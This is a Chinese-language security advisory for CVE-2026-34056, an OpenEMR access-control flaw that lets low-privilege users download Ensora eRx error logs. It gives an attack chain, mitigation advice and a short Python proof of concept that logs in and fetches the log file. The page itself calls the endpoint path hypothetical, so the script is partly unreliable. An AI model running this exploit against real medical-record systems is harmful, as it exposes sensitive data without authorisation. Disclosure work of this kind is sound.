CVE-2026-34056 CVSS 7.7 高危

CVE-2026-34056 OpenEMR权限绕过漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34056

漏洞类型

权限绕过

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenEMR

漏洞概述

OpenEMR是一款广泛使用的开源电子病历及医疗实践管理应用。其8.0.0.3及更早版本中存在一个破坏访问控制漏洞。由于系统未能对特定接口实施严格的权限验证，低权限用户无需交互即可通过网络访问并下载Ensora eRx错误日志。该缺陷严重破坏了系统机密性，导致敏感信息泄露，可能引发未经授权的数据披露与滥用风险。截至目前，官方尚未发布针对此漏洞的修复补丁。

技术细节

该漏洞属于典型的失效访问控制。在OpenEMR的实现逻辑中，用于读取Ensora eRx错误日志的端点缺少对当前用户角色权限的校验机制。根据CVSS向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N）。攻击者只需拥有一个普通低权限账户，即可构造特定的HTTP请求直接访问日志文件路径。由于系统默认允许Web进程读取该日志且未在应用层拦截低权限用户的请求，攻击者成功绕过边界限制。此外，由于作用域为“更改”（S:C），泄露的信息可能被用于进一步攻击其他系统组件。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描OpenEMR系统，确认版本在8.0.0.3及以下，并注册或获取一个低权限用户账户。

STEP 2

2. 权限绕过

攻击者使用低权限账户登录，利用会话Cookie直接发送GET请求访问Ensora eRx错误日志的URL路径。

STEP 3

3. 数据泄露

服务器因缺少授权检查，返回敏感的日志文件内容，攻击者下载并分析其中包含的系统内部信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://target-openemr-domain.com"
log_endpoint = "/interface/log/ensora_erx_error.log"  # Hypothetical path based on description

# Attacker credentials (Low privilege user)
login_url = f"{target_host}/login.php"
session = requests.Session()

# 1. Authenticate as low-privilege user
credentials = {
    "authUser": "low_priv_user",
    "clearPass": "password123"
}
session.post(login_url, data=credentials)

# 2. Exploit Broken Access Control to download logs
exploit_url = f"{target_host}{log_endpoint}"
response = session.get(exploit_url)

# 3. Verify vulnerability
if response.status_code == 200 and "error" in response.text:
    print("[+] Vulnerability Confirmed: Sensitive logs downloaded.")
    print(f"[+] Log Length: {len(response.text)} bytes")
else:
    print("[-] Failed to access logs or patch applied.")

影响范围

OpenEMR <= 8.0.0.3

防御指南

临时缓解措施

建议管理员暂时通过修改Web服务器配置（如Nginx或Apache规则），阻断外部对Ensora eRx相关日志文件路径的直接访问。同时，应在应用层代码中添加权限检查中间件，确保只有管理员角色才能访问系统日志文件。此外，应加强对低权限用户的行为审计，及时发现异常访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表